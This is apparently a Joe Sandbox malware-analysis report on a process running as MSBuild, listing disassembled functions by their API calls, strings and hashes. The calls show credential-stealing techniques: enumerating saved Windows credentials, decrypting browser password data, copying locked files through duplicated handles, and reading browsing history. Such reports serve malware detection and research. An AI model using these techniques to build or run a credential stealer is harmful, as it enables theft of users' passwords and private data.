Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
String ID: dllhost.exe$taskhost.exe$taskhostex.exe
API String ID: 708747863-3398334509
Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142
processlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
memset.MSVCRT ref: 00413D7F
Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
memset.MSVCRT ref: 00413E07
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
free.MSVCRT ref: 00413EC1
Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A

Strings

kernel32.dll, xrefs: 00413E37
QueryFullProcessImageNameW, xrefs: 00413E46

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 1344430650-1740548384
Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
LockResource.KERNEL32(00000000), ref: 0040B5DD
memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D

Strings

BIN, xrefs: 0040B5AB

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
String ID: BIN
API String ID: 1668488027-1015027815
Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
Part of subcall function 00418680: free.MSVCRT ref: 004186C7

Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE

GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
free.MSVCRT ref: 00418803

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
String ID:
API String ID: 1355100292-0
Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769

Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755

Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041898C
GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004455C2
wcsrchr.MSVCRT ref: 004455DA
memset.MSVCRT ref: 0044570D
memset.MSVCRT ref: 00445725

Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C

Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2

Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A

memset.MSVCRT ref: 0044573D
memset.MSVCRT ref: 00445755
memset.MSVCRT ref: 004458CB
memset.MSVCRT ref: 004458E3
memset.MSVCRT ref: 0044596E
memset.MSVCRT ref: 00445A10
memset.MSVCRT ref: 00445A28
memset.MSVCRT ref: 00445AC6

Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7

memset.MSVCRT ref: 00445B52
memset.MSVCRT ref: 00445B6A
memset.MSVCRT ref: 00445C9B
memset.MSVCRT ref: 00445CB3
_wcsicmp.MSVCRT ref: 00445D56
memset.MSVCRT ref: 00445B82

Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C

Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04

memset.MSVCRT ref: 00445986

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Strings

*.*, xrefs: 00445ED0
Apple Computer\Preferences\keychain.plist, xrefs: 00445CD0

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
String ID: *.*$Apple Computer\Preferences\keychain.plist
API String ID: 2263259095-3798722523
Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514

SetErrorMode.KERNELBASE(00008001), ref: 00412799
GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9

Strings

/deleteregkey, xrefs: 00412833
/savelangfile, xrefs: 00412805
, xrefs: 004127CD

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040B71C

Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D

wcsrchr.MSVCRT ref: 0040B738
memset.MSVCRT ref: 0040B756
memset.MSVCRT ref: 0040B7F5
CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
memset.MSVCRT ref: 0040B851
memset.MSVCRT ref: 0040B8CA
memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF

Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
memset.MSVCRT ref: 0040BB53
memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D

Strings

v10, xrefs: 0040B9B7
chp, xrefs: 0040B817

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
String ID: chp$v10
API String ID: 4165125987-2783969131
Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1

Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B

free.MSVCRT ref: 0040E49A

Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69

memset.MSVCRT ref: 0040E380

Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B

wcschr.MSVCRT ref: 0040E3B8
memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D

Strings

CreationTime, xrefs: 0040E329
EntryID, xrefs: 0040E36A
ModifiedTime, xrefs: 0040E350
Url, xrefs: 0040E35D
ExpiryTime, xrefs: 0040E336
, xrefs: 0040E2DD
AccessedTime, xrefs: 0040E343
AccessCount, xrefs: 0040E31C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
API String ID: 3849927982-2252543386
Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004091E2

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
memcpy.MSVCRT(?,00000023,?), ref: 0040930C
memcpy.MSVCRT(?,?,00000010), ref: 00409325
memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
memcpy.MSVCRT(?,00000015,?), ref: 00409357
memcpy.MSVCRT(?,?,00000010), ref: 00409370
memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
memcpy.MSVCRT(?,00000023,?), ref: 00409462
memcpy.MSVCRT(?,?,00000010), ref: 0040947E
memcpy.MSVCRT(?,?,00000020), ref: 0040949A
memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
memcpy.MSVCRT(?,00000015,?), ref: 004094D0
memcpy.MSVCRT(?,?,00000020), ref: 004094E8

Strings

, xrefs: 0040929F

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memcmp$ByteCharMultiWidememset
String ID:
API String ID: 3715365532-3916222277
Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8

OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4

Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85

Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
CloseHandle.KERNELBASE(?), ref: 0040E13E
CloseHandle.KERNEL32(00000000), ref: 0040E143
CloseHandle.KERNEL32(?), ref: 0040E148
CloseHandle.KERNEL32(?), ref: 0040E14D

Strings

bhv, xrefs: 0040E0DD

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
String ID: bhv
API String ID: 4234240956-2689659898
Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F

Strings

EnumProcessModules, xrefs: 00413F71
GetModuleBaseNameW, xrefs: 00413F65
GetModuleInformation, xrefs: 00413F95
GetModuleFileNameExW, xrefs: 00413F7D
EnumProcesses, xrefs: 00413F89
psapi.dll, xrefs: 00413F55

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2941347001-70141382
Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
__set_app_type.MSVCRT ref: 00446762
__p__fmode.MSVCRT ref: 00446777
__p__commode.MSVCRT ref: 00446785
__setusermatherr.MSVCRT ref: 004467B1
_initterm.MSVCRT ref: 004467C7
__wgetmainargs.KERNELBASE ref: 004467EA
_initterm.MSVCRT ref: 004467FD
GetStartupInfoW.KERNEL32(?), ref: 0044685A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
exit.KERNELBASE ref: 00446897
_cexit.MSVCRT ref: 0044689D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C298

Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8

FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
wcschr.MSVCRT ref: 0040C324
wcschr.MSVCRT ref: 0040C344
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
GetLastError.KERNEL32 ref: 0040C373
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
FindCloseUrlCache.WININET(?), ref: 0040C3B0

Strings

visited:, xrefs: 0040C308

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
String ID: visited:
API String ID: 1157525455-1702587658
Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1

memset.MSVCRT ref: 0040E1BD

Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B

free.MSVCRT ref: 0040E28B

Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69

Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20

_snwprintf.MSVCRT ref: 0040E257

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
